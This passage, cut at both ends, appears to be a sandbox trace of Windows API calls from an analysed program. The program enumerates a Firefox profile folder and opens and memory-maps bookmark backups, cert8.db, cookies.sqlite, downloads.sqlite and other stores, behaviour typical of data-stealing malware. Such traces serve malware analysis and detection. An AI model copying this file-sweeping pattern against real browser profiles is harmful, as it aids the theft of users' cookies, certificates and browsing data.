lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x5e1d10, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") returned 0x78 [0589.849] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.849] CloseHandle (hObject=0x668) returned 1 [0589.849] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.849] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0589.849] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.849] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.849] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.849] CloseHandle (hObject=0x66c) returned 1 [0589.849] CloseHandle (hObject=0x668) returned 1 [0589.849] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.849] LocalFree (hMem=0x578c30) returned 0x0 [0589.849] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0589.849] lstrlenW (lpString="\\") returned 1 [0589.849] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.849] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56b3a0 [0589.850] lstrlenW (lpString="bookmarks-2017-07-26_5.json") returned 27 [0589.850] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0589.850] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x578c30 [0589.850] LocalFree (hMem=0x56b3a0) returned 0x0 [0589.850] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.850] CloseHandle (hObject=0x668) returned 1 [0589.850] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0589.850] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x5e1d10 [0589.850] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x5e1d10, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") returned 0x78 [0589.850] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.850] CloseHandle (hObject=0x668) returned 1 [0589.850] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.850] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0589.850] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.850] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.850] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.850] CloseHandle (hObject=0x66c) returned 1 [0589.850] CloseHandle (hObject=0x668) returned 1 [0589.851] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.851] LocalFree (hMem=0x578c30) returned 0x0 [0589.851] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0 [0589.851] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.851] LocalFree (hMem=0x56c300) returned 0x0 [0589.851] LocalFree (hMem=0x56afc8) returned 0x0 [0589.851] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.851] lstrlenW (lpString="\\") returned 1 [0589.851] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.851] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.851] lstrlenW (lpString="cert8.db") returned 8 [0589.851] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.851] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5e1d10 [0589.851] LocalFree (hMem=0x578c30) returned 0x0 [0589.851] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.851] CloseHandle (hObject=0x660) returned 1 [0589.851] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0589.851] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x578c30 [0589.851] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x578c30, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db") returned 0x55 [0589.851] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.851] CloseHandle (hObject=0x660) returned 1 [0589.851] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.851] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0589.851] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.851] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.852] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.852] CloseHandle (hObject=0x668) returned 1 [0589.852] CloseHandle (hObject=0x660) returned 1 [0589.852] LocalFree (hMem=0x578c30) returned 0x0 [0589.852] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.852] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.852] lstrlenW (lpString="\\") returned 1 [0589.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.852] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.852] lstrlenW (lpString="compatibility.ini") returned 17 [0589.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.852] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56afc8 [0589.852] LocalFree (hMem=0x578c30) returned 0x0 [0589.852] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.852] CloseHandle (hObject=0x660) returned 1 [0589.852] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0589.853] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0589.853] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x56c300, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini") returned 0x5e [0589.853] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.853] CloseHandle (hObject=0x660) returned 1 [0589.853] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.853] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0589.853] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.853] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.853] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.853] CloseHandle (hObject=0x668) returned 1 [0589.853] CloseHandle (hObject=0x660) returned 1 [0589.853] LocalFree (hMem=0x56c300) returned 0x0 [0589.853] LocalFree (hMem=0x56afc8) returned 0x0 [0589.853] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.853] lstrlenW (lpString="\\") returned 1 [0589.853] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.853] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.853] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0589.853] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.853] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e1d10 [0589.853] LocalFree (hMem=0x578c30) returned 0x0 [0589.853] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.854] CloseHandle (hObject=0x660) returned 1 [0589.854] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0589.854] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e1e60 [0589.854] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x5e1e60, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite") returned 0x61 [0589.854] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.854] CloseHandle (hObject=0x660) returned 1 [0589.854] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.854] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38000 [0589.854] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.854] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.855] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.856] CloseHandle (hObject=0x668) returned 1 [0589.856] CloseHandle (hObject=0x660) returned 1 [0589.856] LocalFree (hMem=0x5e1e60) returned 0x0 [0589.856] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.856] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.856] lstrlenW (lpString="\\") returned 1 [0589.856] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.856] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.856] lstrlenW (lpString="cookies.sqlite") returned 14 [0589.857] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.857] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.857] LocalFree (hMem=0x578c30) returned 0x0 [0589.857] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.857] CloseHandle (hObject=0x660) returned 1 [0589.857] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.857] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.857] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite") returned 0x5b [0589.857] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.857] CloseHandle (hObject=0x660) returned 1 [0589.857] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.857] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80000 [0589.857] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.857] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.859] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0589.862] CloseHandle (hObject=0x668) returned 1 [0589.862] CloseHandle (hObject=0x660) returned 1 [0589.862] LocalFree (hMem=0x56c300) returned 0x0 [0589.862] LocalFree (hMem=0x56afc8) returned 0x0 [0589.862] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.862] lstrlenW (lpString="\\") returned 1 [0589.862] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.862] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.862] lstrlenW (lpString="downloads.sqlite") returned 16 [0589.862] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.862] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0589.862] LocalFree (hMem=0x578c30) returned 0x0 [0589.862] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.862] CloseHandle (hObject=0x660) returned 1 [0589.863] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0589.863] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0589.863] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x56c300, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite") returned 0x5d [0589.863] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.863] CloseHandle (hObject=0x660) returned 1 [0589.863] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.863] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0589.863] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.863] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.863] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.864] CloseHandle (hObject=0x668) returned 1 [0589.864] CloseHandle (hObject=0x660) returned 1 [0589.864] LocalFree (hMem=0x56c300) returned 0x0 [0589.864] LocalFree (hMem=0x56afc8) returned 0x0 [0589.864] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.864] lstrlenW (lpString="\\") returned 1 [0589.864] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.864] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.864] lstrlenW (lpString="extensions.ini") returned 14 [0589.864] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.864] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.864] LocalFree (hMem=0x578c30) returned 0x0 [0589.864] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.864] CloseHandle (hObject=0x660) returned 1 [0589.864] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.864] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.864] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini") returned 0x5b [0589.865] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.865] CloseHandle (hObject=0x660) returned 1 [0589.865] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.865] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d [0589.865] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, 